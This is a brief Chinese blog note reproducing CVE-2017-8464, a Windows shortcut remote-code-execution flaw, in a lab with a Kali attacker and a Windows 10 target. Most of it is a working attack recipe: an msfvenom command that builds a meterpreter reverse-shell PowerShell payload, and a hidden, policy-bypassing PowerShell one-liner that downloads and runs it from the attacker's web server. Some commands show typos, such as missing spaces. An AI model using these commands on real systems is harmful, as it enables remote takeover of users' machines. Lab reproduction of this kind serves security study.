CVE-2017-8464漏洞复现
- 2019 年 10 月 6 日
- 筆記
CVE-2017-8464是Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
0X1环境搭建
攻击机:kali
靶 机:Win10 x64位
0X2 漏洞利用
生成一个ps后门程序:
msfvenom -p windows/x64/meterpreter/reverse_tcplhost=172.16.1.44 lport=5555 -f psh-reflection>/root/search.ps1

复制到web目录下:

启动web服务查看:

在windows10上创建一个快捷方式:
powershell -windowstyle hidden -exec bypass -c "IEX(New-ObjectNet.WebClient).DownloadString('http://172.16.1.44/search.ps1');test.ps1"


Kali下使用metasploit设置攻击参数

开始攻击,并在windows10下点击powershell.exe


测试成功!